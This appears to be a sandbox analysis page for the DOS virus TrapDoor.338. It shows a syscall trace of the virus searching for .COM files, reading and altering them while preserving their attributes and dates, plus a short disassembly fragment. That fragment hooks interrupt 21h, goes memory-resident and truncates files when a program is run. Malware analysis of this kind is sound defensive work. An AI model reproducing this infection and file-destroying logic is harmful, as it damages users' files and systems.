Sample viewer

vx.netlux.org/Virus.DOS.TrapDoor.338

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:56:21.060786669Z 26 PC: 12a8e | Set disk transfer address
2018-12-17T22:56:21.062362592Z 78 PC: 12a96 | Find first file
2018-12-17T22:56:21.06877738Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.090894638Z 61 PC: 12ab9 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:56:21.09838324Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.105151879Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.10819025Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.11004369Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.118725891Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.128829957Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.131774571Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.134828066Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.144697962Z 61 PC: 12ab9 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:56:21.151529306Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.159321307Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.16107088Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.162886314Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.170814775Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.180862499Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.183722809Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.19382641Z 61 PC: 12ab9 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:56:21.200782429Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.213605184Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.215708906Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.217213865Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.224218638Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.234129242Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.237918894Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.247575708Z 61 PC: 12ab9 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:56:21.254155517Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.260864985Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.262236558Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.263898479Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.271901253Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.281785114Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.284284201Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.294021174Z 61 PC: 12ab9 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:56:21.306326648Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.312947392Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.315232085Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.317000337Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.324207993Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.334969865Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.337555148Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.347602319Z 61 PC: 12ab9 | Open file (Filename = 'PAH.COM')
2018-12-17T22:56:21.354844414Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.361379647Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.363829411Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.367229293Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.375134454Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.386379702Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.389468276Z 67 PC: 12ab4 | Get or set file attributes
2018-12-17T22:56:21.402289113Z 61 PC: 12ab9 | Open file (Filename = 'TEST.COM')
2018-12-17T22:56:21.406508224Z 63 PC: 12ac5 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:56:21.410515968Z 66 PC: 12acd | Move file pointer
2018-12-17T22:56:21.411963583Z 87 PC: 12b13 | Get or set file date and time
2018-12-17T22:56:21.413186347Z 62 PC: 12b17 | Close file
2018-12-17T22:56:21.41812709Z 67 PC: 12b26 | Get or set file attributes
2018-12-17T22:56:21.429556728Z 79 PC: 12a96 | Find next file
2018-12-17T22:56:21.431902035Z 44 PC: 12b2f | Get time 0x12b2f: cmp dl, 4
0x12b32: jb 0x12b46
0x12b34: jmp 0x12b66
0x12b36: cmp ax, 0x4b00
0x12b39: je 0x12b40
0x12b3b: ljmp ptr cs:[0x251]
0x12b40: mov ah, 0x3c
0x12b42: int 0x21
0x12b44: int 0x20
0x12b46: mov ax, 0x3521
0x12b49: int 0x21
0x12b4b: mov word ptr cs:[0x251], bx
0x12b50: mov word ptr cs:[0x253], es
0x12b55: mov ax, 0x2521
0x12b58: lea dx, word ptr [bp + 0x1f6]
0x12b5c: int 0x21
0x12b5e: lea dx, word ptr [bp + 0x206]
0x12b62: int 0x27
0x12b64: int 0x20
0x12b66: mov dx, 0x80
2018-12-17T22:56:21.445736765Z 26 PC: 12b6d | Set disk transfer address